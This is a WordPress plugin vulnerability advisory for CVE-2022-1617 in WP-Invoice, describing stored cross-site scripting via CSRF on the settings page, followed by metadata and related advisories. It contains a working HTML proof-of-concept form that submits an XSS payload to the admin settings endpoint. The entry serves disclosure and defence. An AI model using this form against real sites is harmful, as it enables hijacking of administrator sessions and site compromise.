WP-Invoice <= 4.3.1 – Stored Cross-Site Scripting via CSRF | CVE 2022-1617 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, and is lacking sanitisation as well as escaping in some of them, allowing attacker to make a logged in admin change them and add XSS payload in them

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpi_page_settings" method="POST">
      <input type="hidden" name="wpi_settings_update" value="true" />
      <input type="hidden" name="wpi_settings[business_logo]" value="" />
      <input type="hidden" name="wpi_settings[business_name]" value='WP"><svg/onload=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

No known fix

References

CVE

URL

https://packetstormsecurity.com/files/#166824/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Mariam Tariq

Verified

Yes

WPVDB ID

7e40e506-ad02-44ca-9d21-3634f3907aad

Timeline

Publicly Published

2022-04-25 (about 2 years ago)

Added

2022-04-27 (about 2 years ago)

Last Updated

2022-05-08 (about 2 years ago)

Other

Published

Title

Published

2022-12-28

Title

BruteBank - WP Security & Firewall < 1.9 - Settings Update via CSRF

Published

2024-04-23

Title

Slash Admin < 3.8.2 - Cross-Site Request Forgery

Published

2022-05-16

Title

Discy < 5.2 - Restore Default Settings via CSRF

Published

2022-01-25

Title

Simple Membership < 4.0.9 - Arbitrary Member Deletion via CSRF

Published

2022-06-06

Title

Site Offline or Coming Soon <= 1.6.6 - Stored Cross-Site Scripting via CSRF